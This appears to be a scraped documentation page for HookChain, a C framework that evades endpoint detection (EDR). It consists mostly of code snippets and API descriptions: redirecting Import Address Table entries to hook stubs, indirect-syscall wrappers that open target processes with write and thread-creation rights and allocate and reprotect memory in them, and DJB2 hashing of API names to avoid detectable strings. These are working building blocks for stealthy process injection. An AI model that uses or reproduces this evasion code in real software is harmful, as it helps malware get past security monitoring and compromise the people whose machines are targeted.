### Install IAT Hooks with UnhookAll Source: https://context7.com/helviojunior/hookchain/llms.txt Redirects function pointers in a module's Import Address Table to HookChain stubs to bypass inline EDR hooks. ```c #include "hook.h" void HookTargetModule(const char* moduleName) { // Install IAT hooks on a specific module // This redirects all NT API calls through HookChain if (!UnhookAll((HANDLE)-1, moduleName, TRUE)) { printf("[!] Failed to hook module: %s\n", moduleName); return; } printf("[+] Successfully hooked module: %s\n", moduleName); } // Usage example void ProcessModules(void) { // Hook common modules that make NT syscalls HookTargetModule("kernel32"); HookTargetModule("kernelbase"); HookTargetModule("user32"); HookTargetModule("wininet"); } ``` -------------------------------- ### Initialize HookChain Framework Source: https://context7.com/helviojunior/hookchain/llms.txt Initializes the framework by setting up IAT hooks and syscall tables. This must be called before executing any other HookChain functions. ```c #include "hook.h" INT wmain(int argc, char* argv[]) { // Initialize the HookChain framework printf("[+] Creating HookChain implants\n"); if (!InitApi()) { printf("[!] Failed to initialize API\n"); return 1; } printf("[+] HookChain implanted! \\o/\n"); // Now all hooked syscalls will bypass EDR monitoring // Proceed with operations... return 0; } ``` -------------------------------- ### InitApi - Initialize Framework Source: https://context7.com/helviojunior/hookchain/llms.txt Initializes the HookChain framework by filling the syscall table, setting up function stubs, and processing modules for IAT hooks. ```APIDOC ## InitApi ### Description Initializes the HookChain framework by filling the syscall table, setting up function stubs, and processing all loaded modules to install IAT hooks. This must be called before using other HookChain functions. ### Request Example InitApi(); ``` -------------------------------- ### Open Process Handle via Indirect Syscall Source: https://context7.com/helviojunior/hookchain/llms.txt Opens a process handle using indirect syscalls to bypass ntdll.dll hooks. Requires memory allocation via HookChain's heap stub for object attributes. ```c #include "hook.h" HANDLE OpenTargetProcess(DWORD dwPID) { HANDLE hProcess = NULL; // Allocate structures using HookChain's heap stub POBJECT_ATTRIBUTES objectAttributes = (POBJECT_ATTRIBUTES)RtlAllocateHeapStub( RtlProcessHeap(), HEAP_ZERO_MEMORY, sizeof(OBJECT_ATTRIBUTES) ); PCLIENT_ID clientId = (PCLIENT_ID)RtlAllocateHeapStub( RtlProcessHeap(), HEAP_ZERO_MEMORY, sizeof(CLIENT_ID) ); clientId->UniqueProcess = dwPID; // Open process via indirect syscall NTSTATUS status = NtOpenProcess( &hProcess, PROCESS_VM_WRITE | PROCESS_VM_OPERATION | PROCESS_CREATE_THREAD, objectAttributes, clientId ); if (!NT_SUCCESS(status)) { printf("[!] Failed to open process: Status = 0x%08lx\n", status); return NULL; } printf("[*] Process handle acquired: 0x%p\n", hProcess); return hProcess; } ``` -------------------------------- ### Retrieve Module Base Address with HGetModuleHandleA Source: https://context7.com/helviojunior/hookchain/llms.txt Retrieves the base address of a loaded module. The force parameter allows loading the module if it is not already present in the process. ```c #include "hook.h" void EnumerateModules(void) { // Get handle to already loaded modules FARPROC ntdll = HGetModuleHandleA("ntdll", FALSE); FARPROC kernel32 = HGetModuleHandleA("kernel32", FALSE); printf("[*] ntdll.dll base: 0x%p\n", ntdll); printf("[*] kernel32.dll base: 0x%p\n", kernel32); // Force load a module if not present FARPROC user32 = HGetModuleHandleA("user32", TRUE); printf("[*] user32.dll base: 0x%p\n", user32); } ``` -------------------------------- ### NtOpenProcess - Open Process Handle Source: https://context7.com/helviojunior/hookchain/llms.txt Opens a handle to a target process using indirect system calls to bypass EDR hooks on ntdll.dll. ```APIDOC ## NtOpenProcess ### Description Opens a handle to a target process using indirect system calls that bypass EDR hooks on ntdll.dll. ### Parameters - **dwPID** (DWORD) - Required - The process ID to open. ### Response - **HANDLE** - Returns a handle to the process if successful, otherwise NULL. ``` -------------------------------- ### Allocate Heap Memory with RtlAllocateHeapStub Source: https://context7.com/helviojunior/hookchain/llms.txt Provides a safe heap allocation wrapper that functions before the full framework is initialized, falling back to malloc if necessary. ```c #include "hook.h" void SafeMemoryAllocation(void) { // Allocate zeroed memory from process heap PVOID buffer = RtlAllocateHeapStub( RtlProcessHeap(), HEAP_ZERO_MEMORY, 1024 ); if (buffer != NULL) { // Use the buffer... printf("[*] Allocated buffer at: 0x%p\n", buffer); // Note: This memory comes from the process heap // Use HeapFree or equivalent to release } } ``` -------------------------------- ### NtAllocateVirtualMemory - Allocate Memory Source: https://context7.com/helviojunior/hookchain/llms.txt Allocates virtual memory in a target process using indirect system calls to bypass EDR monitoring. ```APIDOC ## NtAllocateVirtualMemory ### Description Allocates virtual memory in a target process using indirect system calls, bypassing EDR monitoring of memory allocation operations. ### Parameters - **hProcess** (HANDLE) - Required - Target process handle. - **size** (SIZE_T) - Required - Size of the memory region to allocate. ### Response - **PVOID** - Returns the base address of the allocated memory if successful. ``` -------------------------------- ### Resolve Function Addresses with HGetProcAddress Source: https://context7.com/helviojunior/hookchain/llms.txt Resolves function addresses while automatically routing through HookChain stubs to bypass EDR monitoring. ```c #include "hook.h" void ResolveFunctions(void) { // Method 1: Get function from module name directly PVOID pMessageBox = HGetProcAddress2("User32", "MessageBoxW"); printf("[*] MessageBoxW: 0x%p\n", pMessageBox); // Method 2: Get function from existing module handle FARPROC ntdll = HGetModuleHandleA("ntdll", FALSE); PVOID pNtClose = HGetProcAddress(ntdll, "NtClose", 0); printf("[*] NtClose: 0x%p\n", pNtClose); // Note: If the function is hooked by EDR, HGetProcAddress // returns the HookChain stub address instead } ``` -------------------------------- ### Allocate Virtual Memory via Indirect Syscall Source: https://context7.com/helviojunior/hookchain/llms.txt Allocates memory in a remote process using indirect syscalls to avoid EDR detection of memory allocation. ```c #include "hook.h" PVOID AllocateRemoteMemory(HANDLE hProcess, SIZE_T size) { PVOID baseAddress = NULL; SIZE_T regionSize = size; NTSTATUS status = NtAllocateVirtualMemory( hProcess, // Target process handle &baseAddress, // Base address (NULL for system selection) 0, // Zero bits ®ionSize, // Region size MEM_COMMIT | MEM_RESERVE, // Allocation type PAGE_EXECUTE_READ // Memory protection ); if (!NT_SUCCESS(status)) { printf("[!] Failed to allocate memory: Status = 0x%08lx\n", status); return NULL; } printf("[*] Allocated 0x%zx bytes at 0x%p\n", regionSize, baseAddress); return baseAddress; } ``` -------------------------------- ### Compute DJB2 Hashes for API Resolution Source: https://context7.com/helviojunior/hookchain/llms.txt Generates DJB2 hashes for function names to perform lookups without using detectable string comparisons. ```c #include "hook.h" void DemonstrateHashing(void) { // Hash function names for comparison DWORD64 hash1 = djb2((PBYTE)"OpenProcess"); DWORD64 hash2 = djb2((PBYTE)"NtOpenProcess"); printf("[*] Hash of 'OpenProcess': 0x%016llx\n", hash1); printf("[*] Hash of 'NtOpenProcess': 0x%016llx\n", hash2); // Common hash values used in HookChain: // kernel32.dll -> 0x5DC35DC35DC35DFF // ntdll.dll -> 0x5DC35DC35DC35E22 } ``` -------------------------------- ### NtProtectVirtualMemory - Change Memory Protection Source: https://context7.com/helviojunior/hookchain/llms.txt Modifies the protection attributes of virtual memory regions using indirect system calls. ```APIDOC ## NtProtectVirtualMemory ### Description Modifies the protection attributes of virtual memory regions using indirect system calls, allowing memory permission changes without triggering EDR detections. ### Parameters - **hProcess** (HANDLE) - Required - Target process handle. - **address** (PVOID) - Required - Base address of the memory region. - **size** (SIZE_T) - Required - Size of the region. - **newProtect** (DWORD) - Required - New memory protection constant. ### Response - **BOOL** - Returns TRUE if successful, FALSE otherwise. ``` -------------------------------- ### Change Memory Protection via Indirect Syscall Source: https://context7.com/helviojunior/hookchain/llms.txt Modifies memory protection attributes using indirect syscalls to bypass EDR monitoring of permission changes. ```c #include "hook.h" BOOL SetMemoryProtection(HANDLE hProcess, PVOID address, SIZE_T size, DWORD newProtect) { PVOID baseAddress = address; ULONG regionSize = (ULONG)size; DWORD oldProtect = 0; NTSTATUS status = NtProtectVirtualMemory( hProcess, &baseAddress, ®ionSize, newProtect, &oldProtect ); if (!NT_SUCCESS(status)) { printf("[!] Failed to change protection: Status = 0x%08lx\n", status); return FALSE; } printf("[*] Protection changed: 0x%08lx -> 0x%08lx\n", oldProtect, newProtect); return TRUE; } ``` === COMPLETE CONTENT === This response contains all available snippets from this library. No additional content exists. Do not make further requests.